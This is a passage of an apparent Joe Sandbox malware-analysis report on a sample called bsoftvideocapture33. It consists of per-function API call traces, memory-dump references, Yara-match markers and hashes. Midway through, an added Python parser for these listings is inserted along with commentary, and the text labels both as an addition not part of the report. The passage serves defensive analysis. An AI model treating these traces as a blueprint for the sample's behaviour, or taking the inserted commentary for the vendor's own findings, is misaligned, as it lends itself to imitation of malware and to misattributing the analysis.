                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                                                                          • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60964783
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 571598680-0
                                                                                                                                        • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                                                        • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                                                                        • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040372D
                                                                                                                                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 00403741
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040376D
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037A5
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037C7
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037E0
                                                                                                                                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 004037F3
                                                                                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403831
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1823725401-0
                                                                                                                                        • Opcode ID: 29f2d76fac090216a30a5ebb2bb190fa98c47cf692b42f92f5f77d8145aa531c
                                                                                                                                        • Instruction ID: d646e254ae1f8dd71c5cd3670e2a02489b7ca9a5ac7c87ef76d14b342e535d81
                                                                                                                                        • Instruction Fuzzy Hash: 3431D2F35082615ED7203F745D8483BBE9CEA4530AB15453FF981F3280DA795D4286A9
                                                                                                                                        APIs
                                                                                                                                        • OpenEventA.KERNEL32(00100002,00000000,00000000,4213E8DE), ref: 02C106C0
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C106D5
                                                                                                                                        • ResetEvent.KERNEL32(00000000,4213E8DE), ref: 02C106DF
                                                                                                                                        • CloseHandle.KERNEL32(00000000,4213E8DE), ref: 02C10714
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4213E8DE), ref: 02C1078A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C1079F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEventHandle$CreateOpenReset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1285874450-0
                                                                                                                                        • Opcode ID: 83618f0f666cc5b89656f60178e96bb7361ad36d29239f685b89b0960763d973
                                                                                                                                        • Instruction ID: 42be9c5df8d0984fdfc254f158d38faf8076f954321fbfebdb9622224d7a48a2
                                                                                                                                        • Opcode Fuzzy Hash: 83618f0f666cc5b89656f60178e96bb7361ad36d29239f685b89b0960763d973
                                                                                                                                        • Instruction Fuzzy Hash: CD415D70D00358ABDF20CBA5CC4ABAEB7B8BF46724F144619E818EB280D7709A45DF91
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C020AC
                                                                                                                                        • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C020CD
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C020D8
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 02C0213E
                                                                                                                                        • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C0217A
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 02C02187
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C021A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1171374749-0
                                                                                                                                        • Opcode ID: bf51d2f39d50deccbe88b74f8798b7f6c127c049868a2141ecf3691659335fb6
                                                                                                                                        • Instruction ID: 553f22fa137aa142aa58066c0ae6f52ff941789b7d8ea937c0a7cff281e88609
                                                                                                                                        • Opcode Fuzzy Hash: bf51d2f39d50deccbe88b74f8798b7f6c127c049868a2141ecf3691659335fb6
                                                                                                                                        • Instruction Fuzzy Hash: B7410A715047019FC325DF25D888A6BBBF9FFC8754F544A1EE89682690DB30E909CFA2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C10EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C1073E,?,?), ref: 02C10F0F
                                                                                                                                          • Part of subcall function 02C10EE0: CloseHandle.KERNEL32(00000000,?,?,02C1073E,?,?), ref: 02C10F24
                                                                                                                                          • Part of subcall function 02C10EE0: SetEvent.KERNEL32(00000000,02C1073E,?,?), ref: 02C10F37
                                                                                                                                        • OpenEventA.KERNEL32(00100002,00000000,00000000,4213E8DE), ref: 02C106C0
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C106D5
                                                                                                                                        • ResetEvent.KERNEL32(00000000,4213E8DE), ref: 02C106DF
                                                                                                                                        • CloseHandle.KERNEL32(00000000,4213E8DE), ref: 02C10714
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C10745
                                                                                                                                          • Part of subcall function 02C131CA: RaiseException.KERNEL32(?,?,02C0EB64,?,?,?,?,?,?,?,02C0EB64,?,02C2ECA8,?), ref: 02C1321F
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4213E8DE), ref: 02C1078A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C1079F
                                                                                                                                          • Part of subcall function 02C10C20: GetCurrentProcessId.KERNEL32(?), ref: 02C10C79
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,4213E8DE), ref: 02C107AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2227236058-0
                                                                                                                                        • Opcode ID: 1dff74ba3467570295e9a51ccabc69be743e99c7bf873b394a103a1dd8b98c84
                                                                                                                                        • Instruction ID: a1d8f58074941ac95fc30922a41b1fa355733426e0b64164f8806e4adbe63f2c
                                                                                                                                        • Opcode Fuzzy Hash: 1dff74ba3467570295e9a51ccabc69be743e99c7bf873b394a103a1dd8b98c84
                                                                                                                                        • Instruction Fuzzy Hash: 19316371D00358ABDF21DBA4DC46BADB7B9AF46314F144119EC18EB281D7309A45DF91
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                                                          • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                                                                        • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                                                                        • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                                                        • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60963621
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4276469440-0
                                                                                                                                        • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                                                        • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                                                                        • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                                                        • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C02706
                                                                                                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C0272B
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C23173), ref: 02C02738
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02C02778
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C027D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                                        • String ID: timer
                                                                                                                                        • API String ID: 4293676635-1792073242
                                                                                                                                        • Opcode ID: b185e25b80a418f3bf3ca5460265076b90b178316f6016cffcb2ed4abe66d255
                                                                                                                                        • Instruction ID: 58c7c8e5153c406b5253a6efd6b8cb435bc5727594f19ed9174f25db3a007e7f
                                                                                                                                        • Opcode Fuzzy Hash: b185e25b80a418f3bf3ca5460265076b90b178316f6016cffcb2ed4abe66d255
                                                                                                                                        • Instruction Fuzzy Hash: D2318FB1904715AFD310DF69D888B17BBE8FB48765F004A2DF85582680DB70E954CFD6
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                                                                        Strings
                                                                                                                                        • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                                                                        • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                                                                        • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                        • API String ID: 4080917175-264706735
                                                                                                                                        • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                                                        • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                                                                        • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                                                        • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                                                                        • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                                                                        • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID: library routine called out of sequence$out of memory
                                                                                                                                        • API String ID: 2019783549-3029887290
                                                                                                                                        • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                                                        • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                                                                        • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                                                        • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
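The function listings above are raw report output; to triage a report of this size it helps to have them as data rather than text. What follows is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: a small Python parser for the "APIs" bullets in the format shown on this page, run over a constructed sample copied from the listings above. It assumes only the three line shapes visible here (direct calls with an argument list, calls without one, and "Part of subcall function" sub-bullets) and treats the "Strings" and "Memory Dump Source" headings as the end of a function's API list; the helper names (`parse_api_blocks`, `direct_sequence`, `resolved_names`, and so on) are this example's own.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report into call records."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample (not the full report): a few listings copied in the shape seen on this page.
SAMPLE = """\
APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C020AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C020CD
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C0217A
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
APIs
• sqlite3_value_text.SQLITE3 ref: 6091A240
• sqlite3_value_bytes.SQLITE3 ref: 6091A25A
Strings
• LIKE or GLOB pattern too complex, xrefs: 6091A267
Memory Dump Source
APIs
• __init_pointers.LIBCMT ref: 02C14A04
  • Part of subcall function 02C170C0: RtlEncodePointer.NTDLL(00000000), ref: 02C170C3
  • Part of subcall function 02C170C0: GetModuleHandleW.KERNEL32(kernel32.dll,?,02C2F248,00000008,00000003,02C2EC8C,?,00000001), ref: 02C17E41
  • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C17E55
  • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C17EED
Memory Dump Source
"""

# One "APIs" bullet. Three shapes occur on the page:
#   • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C17E55                       direct call with arguments
#   • __CxxThrowException@8.LIBCMT ref: 02C10745                                      call without an argument list
#   • Part of subcall function 02C170C0: RtlEncodePointer.NTDLL(...), ref: 02C170C3   call made by a callee
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list             # raw argument strings; "?" means the sandbox could not recover the value
    ref: str               # address of the call site
    parent: Optional[str]  # address of the callee that makes the call, None for a direct call


def parse_api_blocks(text):
    """Return one list of ApiCall per analysed function, in report order."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
            continue
        if stripped in ("Strings", "Memory Dump Source"):
            current = None  # end of this function's API bullets
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        current.append(ApiCall(m.group("api"), m.group("module"), args,
                               m.group("ref").upper(), m.group("parent")))
    return blocks


def direct_sequence(block):
    """API names the function calls itself, in the order the report lists them."""
    return [c.api for c in block if c.parent is None]


def subcalls_by_function(block):
    """Calls attributed to callees, keyed by the callee's address."""
    tree = {}
    for c in block:
        if c.parent is not None:
            tree.setdefault(c.parent, []).append(c.api)
    return tree


def modules_used(block):
    return {c.module for c in block}


def resolved_names(block):
    """Export names passed to GetProcAddress, i.e. imports the code resolves at run time."""
    return [c.args[1] for c in block
            if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] != "?"]


if __name__ == "__main__":
    for i, block in enumerate(parse_api_blocks(SAMPLE)):
        print(i, direct_sequence(block), sorted(modules_used(block)), resolved_names(block))
```

Once the listings are records, the GetProcAddress targets become easy to compare against known runtime-library sets: the names resolved under `__init_pointers` (FlsAlloc, FlsFree, InitializeCriticalSectionEx, CreateThreadpoolTimer and the rest) are the MSVC CRT probing kernel32 for optional APIs during start-up, not the sample's own import hiding, so a "dynamically resolves APIs" signature is weak evidence on its own until those CRT names are filtered out and what remains is inspected.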
                                                                                                                                        APIs
                                                                                                                                        • __init_pointers.LIBCMT ref: 02C14A04
                                                                                                                                          • Part of subcall function 02C170C0: RtlEncodePointer.NTDLL(00000000), ref: 02C170C3
                                                                                                                                          • Part of subcall function 02C170C0: __initp_misc_winsig.LIBCMT ref: 02C170DE
                                                                                                                                          • Part of subcall function 02C170C0: GetModuleHandleW.KERNEL32(kernel32.dll,?,02C2F248,00000008,00000003,02C2EC8C,?,00000001), ref: 02C17E41
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C17E55
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C17E68
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C17E7B
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C17E8E
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C17EA1
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C17EB4
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C17EC7
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C17EDA
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C17EED
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C17F00
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C17F13
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C17F26
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C17F39
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C17F4C
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C17F5F
                                                                                                                                        • __mtinitlocks.LIBCMT ref: 02C14A09
                                                                                                                                        • __mtterm.LIBCMT ref: 02C14A12
                                                                                                                                          • Part of subcall function 02C14A7A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C174F6
                                                                                                                                          • Part of subcall function 02C14A7A: _free.LIBCMT ref: 02C174FD
                                                                                                                                          • Part of subcall function 02C14A7A: RtlDeleteCriticalSection.NTDLL(02C31978), ref: 02C1751F
                                                                                                                                        • __calloc_crt.LIBCMT ref: 02C14A37
                                                                                                                                        • __initptd.LIBCMT ref: 02C14A59
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02C14A60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                        • Opcode ID: 1872f6af1a4095fd3248341b28a80e11bce3422f1c4c7b2bd6898dc405e40eec
                                                                                                                                        • Instruction ID: 1e10bcfd50ab6e0784b6d1f5681508bf792b69a63065926e69e7093bd2687e66
                                                                                                                                        • Opcode Fuzzy Hash: 1872f6af1a4095fd3248341b28a80e11bce3422f1c4c7b2bd6898dc405e40eec
                                                                                                                                        • Instruction Fuzzy Hash: C2F0F0335883116DE63CBBB87C1336A2A869F43770B220B29E025D84C0FF118101B984
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 02C124EB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C124F2
                                                                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02C124FE
                                                                                                                                        • RtlDecodePointer.NTDLL(00000001), ref: 02C1251B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                        • API String ID: 3489934621-340411864
                                                                                                                                        • Opcode ID: 7cdec6ee546dd2948f8671a08559df9a21677a0906e9ad795385d8b60b0f9dc8
                                                                                                                                        • Instruction ID: 02e691cadad034404f09f421aa90f070ae687eda24a158eb7b0c8bcfb917be42
                                                                                                                                        • Opcode Fuzzy Hash: 7cdec6ee546dd2948f8671a08559df9a21677a0906e9ad795385d8b60b0f9dc8
                                                                                                                                        • Instruction Fuzzy Hash: 32E01271FE0310ABEB345BB4ECCEB153AB9A741786F515E60B042D5084CFB4416C9F60
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C124C0), ref: 02C125C0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C125C7
                                                                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02C125D2
                                                                                                                                        • RtlDecodePointer.NTDLL(02C124C0), ref: 02C125ED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                        • API String ID: 3489934621-2819208100
                                                                                                                                        • Opcode ID: 62251a08513ddb1826b13314274023b63d3ae47e24be9d6b0962ce357cdd6e24
                                                                                                                                        • Instruction ID: ceaa7413686948fb82c76f991730b0e173cdbc40645a85b27fdad5efea66c3ed
                                                                                                                                        • Opcode Fuzzy Hash: 62251a08513ddb1826b13314274023b63d3ae47e24be9d6b0962ce357cdd6e24
                                                                                                                                        • Instruction Fuzzy Hash: 80E0BF70ED0210ABE7385B60BD1DB153668B744745F511E24F506E6244DFB851689E60
                                                                                                                                        APIs
                                                                                                                                        • TlsGetValue.KERNEL32(FFFFFFFF,4213E8DE,?,?,?,?,00000000,02C240D8,000000FF,02C111DA), ref: 02C10F7A
                                                                                                                                        • TlsSetValue.KERNEL32(FFFFFFFF,02C111DA,?,?,00000000), ref: 02C10FE7
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C11011
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 02C11014
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
